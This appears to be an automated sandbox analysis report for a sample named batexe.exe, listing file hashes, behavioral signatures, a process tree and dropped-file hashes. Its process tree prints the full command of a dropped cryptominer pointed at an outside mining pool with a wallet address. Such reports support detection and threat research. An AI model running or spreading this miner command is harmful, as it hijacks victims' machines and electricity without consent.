Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
297s -
max time network
305s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
17/02/2024, 10:55
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240214-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 4716 b2e.exe 4704 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 4704 cpuminer-sse2.exe 4704 cpuminer-sse2.exe 4704 cpuminer-sse2.exe 4704 cpuminer-sse2.exe 4704 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/2088-9-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2088 wrote to memory of 4716 2088 batexe.exe 84 PID 2088 wrote to memory of 4716 2088 batexe.exe 84 PID 2088 wrote to memory of 4716 2088 batexe.exe 84 PID 4716 wrote to memory of 3092 4716 b2e.exe 85 PID 4716 wrote to memory of 3092 4716 b2e.exe 85 PID 4716 wrote to memory of 3092 4716 b2e.exe 85 PID 3092 wrote to memory of 4704 3092 cmd.exe 88 PID 3092 wrote to memory of 4704 3092 cmd.exe 88
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2088 -
C:\Users\Admin\AppData\Local\Temp\9EB1.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\9EB1.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\9EB1.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4716 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A75C.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:3092 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4704
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
14.7MB
MD5759824068d42e5538499019b9fb2775e
SHA15918acd8149cb3f0c49125bd975cb7db7b5b964c
SHA25677b1e8343bdd71e4d20c8448c49828afd717d642ee4cce89f8a2c135878bec02
SHA5126bd2a2c310859a786b01bbb46e753f3198a40f9eefe60652a481fbd7c263993e63431f917cd02e7d0f75a9132911b6753dadbf63770a7cff55feffdbad1e07b1
-
Filesize
2.9MB
MD54c3d430031bcab65f5a8bacc10ead826
SHA1c283a40b8a862a1f261c051da080b98b4ea802f1
SHA256c055d1ff7490a70ef6687afd37b1fafaddc020a50e425c4abfcc211e7387a91b
SHA512a7c198369c965d2d86bb07d0fddc8dc4e8c6f3a682ff11423f6b02766a7594643eec0b95daad7168c1d851a79332ab13c341c8c0bf0fe18a648df6331fad881c
-
Filesize
2.8MB
MD51cd1f1463362e82070bd38c1ad8de2d3
SHA102b59eedcca64d1bcdbebabb05228cd292c1fdde
SHA25680c54200113264848b0a02dfef414bee7e1000ae8db116136fad1a6474d43e29
SHA512f67290611bf4653411f513f696f93add280763b3da208f3ad6a5c2b171fde413daf0d6e4909a13d93a08eed4946e98332ba40d07e39ba686cf356da9d87c355f
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
320KB
MD559d36bdd941feb6c770ec68a37e8c21b
SHA11191d1e478164cd720974ea1ad2bc248999a8d45
SHA256d5227dca74d9be12116b359c9d61265b102c0986eb6196e269cc3e3b895c0293
SHA512b1620dd0763f2f7c263ae69c71eba7cba29d89f1bb551356abb7073e4e7013347345c43f2bad3c4733300c5b98feecf2fd91db2a363c9e5dcdd87f170edbe406
-
Filesize
177KB
MD54652f8de3facf4b25ebe6885a599609f
SHA16940b84b9aedb10075d6c6e08ff783175a54b1c3
SHA25614a3a03e6c1951f9097008aabe88048b865465c4b1e885ad6f697553a3bfe9e5
SHA51262b0169f8b0f7f4e17908f9c4accdfbc27e84a146639df09aaaf6831953ca258145686662ccc0e15d12bce59808ffc35831aeabfb219602a91c8e96a525112fd
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
1.2MB
MD57cf672bee2afba2dcd0c031ff985958e
SHA16b82a205db080ffdcb4a4470fce85a14413f3217
SHA256c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05
SHA5123e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5
-
Filesize
256KB
MD51d86b9560854472453237bcbaa2e253f
SHA15a03a7902d250377a3e9f746badcb696e2c98228
SHA2561493703a430c68bdcedcb4078486daca39a02820199e7b72017c7b1af66e1c8d
SHA512afbc3d7f8e06e41db25d666999f4d162af7054a66b17a651ac8a7f092f83580a067bfa2f558be65ace5966dffaa8735fe7a579e88bf42b34eaa3e72cdec96699
-
Filesize
48KB
MD534cb7e4d3eee74a3686b4284f5c1fa73
SHA15b56135bee0786662a213c85d8a284590ec228cb
SHA256814c3ef25c3bae791473d2ed4320ab63b0b5168bfbcef57204c643dba27b6332
SHA512e90224a4fe1e5b419b94b27315a969fda57a53034179ad4ccafb43fbe2599419324399ab71d715267a1869ea98ad5d61a3a306e9fc0d8b4ae6d8b2dce0f0d6f4
-
Filesize
42KB
MD58e156f809ab599c49b91b6f01e1d9a03
SHA10c06de264beb8ae5dc259c81d0c01e413933e68e
SHA256373a94c1bb30ab08b6a7dc9ff1f3d603f8d90c3204856aaae6096ba35e7b1b89
SHA512df27a7ea26a35836cfc48e70421890e762c36996983e209994dda908d71fe06ce2c39d42b5d1c4f18ab9ae9e44e5baf930db4d8ced7d40285ad4fed239811441
-
Filesize
192KB
MD5625f906456510afaf916dd0384d76eee
SHA166c56574aff02fb199caa60ab71ca9f1c9e7fc92
SHA25627baaef233592b03722c7d64c26d2270c0300ffb8e7f08a8e0d65212af4b848d
SHA512041399c5ddc614d8b1a359238df8fb09258c95a0013e5139dbf4093b892395f5f78fa31fbecfee92966c5e78a5c5894005c98e559b8b5735ecf9c1995df51b17
-
Filesize
64KB
MD56cccf65bd7d7ff5b53aeb882e15c462c
SHA1a9822b63ad70c6085ed1deda0fbe4bc5fe555f3d
SHA2561379cd6111c2c37cf16f2dd9b325118513e85c35543ba45e79deb504dd4c01d2
SHA512c174b5f8615131c2b86c57aee166744ee1fe02ff7c916195f2fde06684f467545a3fa4f88083335e2045d12727d774279dc8672ec352de3095b729aa5d1dedcb